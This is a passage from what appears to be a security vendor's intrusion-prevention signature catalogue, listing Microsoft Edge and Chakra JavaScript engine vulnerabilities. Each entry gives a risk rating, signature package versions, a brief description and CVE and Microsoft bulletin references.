https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11893
Back to top

Microsoft-Edge-Chakra-NewScObjectNoCtor-InitProtoType-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: A type confusion vulnerability has been reported in Microsoft Edge Chakra JavaScript Engine. The vulnerability is due to insufficient validation when running the InitProtoType or InitProtoType opcodes. A remote attacker could exploit these vulnerabilities by enticing the target user to open a specially crafted web page or document. Successful exploitation, in the worst case, could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Edge-Chakra-NewScObjectNoCtor-InitProtoType-Confusion
References:
CVE-2019-0567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0567
Back to top

Microsoft-Edge-Chakra-OP_memset-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There has been reported a type confusion vulnerability in Microsoft Edge Chakra JavaScript Engine. Successful exploitation could lead to arbitrary code execution.
Situation: File-Text_Microsoft-Edge-Chakra-OP_memset-Type-Confusion
References:
CVE-2017-11873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11873
Back to top

Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8466

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8466
References:
CVE-2018-8466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8466
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8467

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8467
References:
CVE-2018-8467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8467
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

Microsoft-Edge-Chakra-Templatedforeachiteminrange-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in the Chakra component of Microsoft Edge. A remote attacker can use this to disclose sensitive memory contents.
Situation: File-Text_Microsoft-Edge-Chakra-Templatedforeachiteminrange-Type-Confusion
References:
CVE-2016-7194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7194
MS16-119
http://technet.microsoft.com/security/bulletin/MS16-119
Back to top

Microsoft-Edge-Chakra-Todefiniteanynumber-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There has been reported a type confusion vulnerability in Microsoft Edge Chakra JavaScript Engine. Successful exploitation could lead to arbitrary code execution.
Situation: File-Text_Microsoft-Edge-Chakra-Todefiniteanynumber-Type-Confusion
References:
CVE-2017-11840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11840
Back to top

Microsoft-Edge-Chakra-Type-Confusion-Suspected-Exploit

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: A certain float value has been associated with multiple exploits against the Chakra scripting engine in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Chakra-Type-Confusion-Suspected-Exploit
Back to top

Microsoft-Edge-Code-Execution-CVE-2015-6168

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Edge Detected
Risk: Moderate
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Edge Detected
Situation: File-Text_Microsoft-Edge-Code-Execution-CVE-2015-6168
References:
CVE-2015-6168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6168
MS15-125
http://technet.microsoft.com/security/bulletin/MS15-125
Back to top

Microsoft-Edge-Code-Execution-CVE-2015-6170

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Edge Detected
Risk: Moderate
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Edge Detected
Situation: File-Text_Microsoft-Edge-XSS-CVE-2015-6170
References:
CVE-2015-6170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6170
MS15-125
http://technet.microsoft.com/security/bulletin/MS15-125
Back to top

Microsoft-Edge-Coptionscollectioncacheitem-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An out-of-bounds read vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Coptionscollectioncacheitem-Out-Of-Bounds-Read
References:
CVE-2017-8734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8734
Back to top

Microsoft-Edge-CVE-2015-2442

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: A vulnerability in Microsoft Edge
Situation: File-Text_Microsoft-Edge-CVE-2015-2442
References:
CVE-2015-2442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2442
MS15-091
http://technet.microsoft.com/security/bulletin/MS15-091
Back to top

Microsoft-Edge-CVE-2015-2446

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: A vulnerability in Microsoft Edge
Situation: File-Text_Microsoft-Edge-CVE-2015-2446
References:
CVE-2015-2442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2442
MS15-091
http://technet.microsoft.com/security/bulletin/MS15-091
Back to top

Microsoft-Edge-CVE-2015-6064

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Edge detected
Risk: Low
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Edge
Situation: File-Text_Microsoft-Edge-CVE-2015-6064
References:
CVE-2015-6064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6064
MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113
Back to top

Microsoft-Edge-CVE-2016-0003-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-CVE-2016-0003-Type-Confusion
References:
CVE-2016-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0003
MS16-002
http://technet.microsoft.com/security/bulletin/MS16-002
Back to top

Microsoft-Edge-CVE-2016-0161-Privilege-Escalation

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: There exists a privilege escalation vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-CVE-2016-0161-Privilege-Escalation
References:
CVE-2016-0161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0161
MS16-038
http://technet.microsoft.com/security/bulletin/MS16-038
Back to top

Microsoft-Edge-CVE-2016-3222-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: A vulnerability in Microsoft Edge, in Windows 10 version 1511, which allows remote attackers to execute arbitrary code or cause a denial of service condition via a crafted website.
Situation: File-Text_Microsoft-Edge-CVE-2016-3222-Memory-Corruption
References:
CVE-2016-3222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3222
MS16-068
http://technet.microsoft.com/security/bulletin/MS16-068
Back to top

Microsoft-Edge-CVE-2016-3244-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: A vulnerability in Microsoft Edge
Situation: File-Text_Microsoft-Edge-CVE-2016-3244-Information-Disclosure
References:
CVE-2016-3244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3244
MS16-085
http://technet.microsoft.com/security/bulletin/MS16-085
Back to top

Microsoft-Edge-CVE-2016-7200

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: A vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-CVE-2016-7200
References:
CVE-2016-7200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7200
MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129
Back to top

Microsoft-Edge-CVE-2016-7206

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-834-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: There exists an information disclosure vulnerability in Microsoft Edge. A remote attacker can use this to disclose a targets browser history.
Situation: HTTP_CRL-Microsoft-Edge-CVE-2016-7280
File-Text_Microsoft-Edge-CVE-2016-7206
References:
CVE-2016-7206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7206
MS16-145
http://technet.microsoft.com/security/bulletin/MS16-145
Back to top

Microsoft-Edge-CVE-2016-7242

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: A vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-CVE-2016-7242
References:
CVE-2016-7242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7242
MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129
Back to top

Microsoft-Edge-CVE-2016-7286-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-CVE-2016-7286-Memory-Corruption
References:
CVE-2016-7286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7286
MS16-145
http://technet.microsoft.com/security/bulletin/MS16-145
Back to top

Microsoft-Edge-CVE-2016-7287

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-834-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a vulnerability in Microsoft Edge. Successful exploitation may permit an attacker to bypass browser security features.
Situation: File-Text_Microsoft-Edge-CVE-2016-7287
References:
CVE-2016-7287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7287
MS16-144
http://technet.microsoft.com/security/bulletin/MS16-144
Back to top

Microsoft-Edge-CVE-2017-0023

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Edge
Situation: File-PDF_Microsoft-Edge-CVE-2017-0023
References:
CVE-2017-0023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0023
MS17-008
http://technet.microsoft.com/security/bulletin/MS17-008
Back to top

Microsoft-Edge-CVE-2017-0065-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an information disclosure vulnerability in Microsoft Edge. A remote attacker can use this to gain access to sensitive information.
Situation: File-Text_Microsoft-Edge-CVE-2017-0065-Information-Disclosure
References:
CVE-2017-0065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0065
MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007
Back to top

Microsoft-Edge-CVE-2017-0070-Getter-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-CVE-2017-0070-Getter-Use-After-Free
References:
CVE-2017-0070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0070
Back to top

Microsoft-Edge-CVE-2017-8652-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Edge. A remote attacker can use this to gain access to sensitive information.
Situation: File-Text_Microsoft-Edge-CVE-2017-8652-Use-After-Free
References:
CVE-2017-8652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8652
ms17-aug
http://technet.microsoft.com/security/bulletin/ms17-aug
Back to top

Microsoft-Edge-Document.domain-Same-Origin-Policy-Bypass

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a policy bypass vulnerability in Microsoft Edge. A remote attacker can use this to disclose sensitive information.
Situation: File-Text_Microsoft-Edge-Document.domain-Same-Origin-Policy-Bypass
References:
CVE-2017-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0002
MS17-001
http://technet.microsoft.com/security/bulletin/MS17-001
Back to top

Microsoft-Edge-Doloopbodystart-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1010-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: A remote attacker could exploit this out-of-bounds vulnerability to get arbitrary code execution in the context of the target user.
Situation: File-Text_Microsoft-Edge-Doloopbodystart-Out-Of-Bounds-Read
References:
CVE-2017-11811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11811
Back to top

Microsoft-Edge-Elevation-of-Privilege-CVE-2019-0566

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1124-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a elevation of privilege vulnerability in Microsoft Edge. This vulnerability can be used to cause a violation in the session boundary on the affected system.
Situation: File-Exe_Microsoft-Edge-Elevation-of-Privilege-CVE-2019-0566
References:
CVE-2019-0566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0566
ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan
Back to top

Microsoft-Edge-Frame-Elements-Same-Origin-Policy-Bypass

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-872-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a security policy bypass vulnerability in Microsoft Edge. A remote attacker can use this to disclose sensitive information.
Situation: File-Text_Microsoft-Edge-Frame-Elements-Same-Origin-Policy-Bypass
References:
CVE-2017-0066
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0066
MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007
Back to top

Microsoft-Edge-Information-Disclosure-CVE-2018-8545

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an information disclosure vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Information-Disclosure-CVE-2018-8545
References:
CVE-2018-8545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8545
ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov
Back to top

Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2016-3277

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Input Validation
Description: There exists an information disclosure vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2016-3277
References:
CVE-2016-3277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3277
MS16-085
http://technet.microsoft.com/security/bulletin/MS16-085
Back to top

Microsoft-Edge-InstanceOf-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: A vulnerability in Microsoft Edge Chakra JavaScript Engine which allows remote attackers to execute arbitrary code by sending a specially crafted web page or document, due to insufficient validation of objects within the Js::JavascriptTypedObjectSlotAccessorFunction::InstanceOf() function.
Situation: File-Text_Microsoft-Edge-InstanceOf-Type-Confusion
References:
CVE-2018-0893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0893
Back to top

Microsoft-Edge-JavaScript-Engine-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge Chakra JavaScript Engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-JavaScript-Engine-Array.unshift-Method-Memory-Corruption
File-Text_Microsoft-Edge-JavaScript-Engine-Array.shift-Method-Memory-Corruption
References:
CVE-2016-0186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0186
MS16-052
http://technet.microsoft.com/security/bulletin/MS16-052
Back to top

Microsoft-Edge-Memory-Corruption-CVE-2016-0024

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: A vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-0024
References:
CVE-2016-0024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0024
MS16-002
http://technet.microsoft.com/security/bulletin/MS16-002
Back to top

Microsoft-Edge-Memory-Corruption-CVE-2016-3199

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3199
References:
CVE-2016-3199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3199
MS16-068
http://technet.microsoft.com/security/bulletin/MS16-068
Back to top

Microsoft-Edge-Memory-Corruption-CVE-2016-3222

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3222
References:
CVE-2016-3222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3222
MS16-068
http://technet.microsoft.com/security/bulletin/MS16-068
Back to top

Microsoft-Edge-Memory-Corruption-CVE-2016-3271

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Buffer Overflow
Description: A vulnerability in Microsoft Edge
Situation: File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3271
References:
CVE-2016-3271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3271
MS16-085
http://technet.microsoft.com/security/bulletin/MS16-085
Back to top

Microsoft-Edge-Memory-Corruption-CVE-2017-0010

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A privilege escalation vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-CVE-2017-0010
References:
CVE-2017-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0010
MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007
Back to top

Microsoft-Edge-Memory-Corruption-CVE-2017-0141

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A privilege escalation vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-CVE-2017-0141
References:
CVE-2017-0141
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0141
MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007
Back to top

Microsoft-Edge-Memory-Corruption-CVE-2018-0980

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: There exists a memory corruption vulnerability in the Chakra scripting engine in Microsoft Edge. A succesful exploit could lead to remote code execution in the security context of the current user.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-0980
References:
CVE-2018-0980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0980
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Edge-Memory-Corruption-CVE-2018-8110

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8110
References:
CVE-2018-8110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8110
ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun
Back to top

Microsoft-Edge-Memory-Corruption-CVE-2018-8111

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8111
References:
CVE-2018-8111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8111
ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun
Back to top

Microsoft-Edge-Memory-Corruption-CVE-2018-8236

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8236
References:
CVE-2018-8236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8236
ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun
Back to top

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2016-0191

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-762-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There is a vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2016-0191
References:
CVE-2016-0191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0191
MS16-052
http://technet.microsoft.com/security/bulletin/MS16-052
Back to top

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0758

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Buffer Overflow
Description: There has been reported a scripting engine memory corruption vulnerability in Microsoft Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0758
References:
CVE-2018-0758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0758
Back to top

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0762

About this vulnerability: A vulnerability in Microsoft Edge and Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0
Type: Buffer Overflow
Description: There has been reported a scripting engine memory corruption vulnerability in Microsoft Internet Explorer and Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0762
References:
CVE-2018-0762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0762
Back to top

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0777

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Buffer Overflow
Description: There has been reported a scripting engine memory corruption vulnerability in Microsoft Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0777
References:
CVE-2018-0777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0777
Back to top

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0872

About this vulnerability: A vulnerability in Microsoft Edge and Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There has been reported a scripting engine memory corruption vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0872
References:
CVE-2018-0872
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0872
Back to top

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0874

About this vulnerability: A vulnerability in Microsoft Edge and Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There has been reported a scripting engine memory corruption vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0874
References:
CVE-2018-0874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0874
Back to top

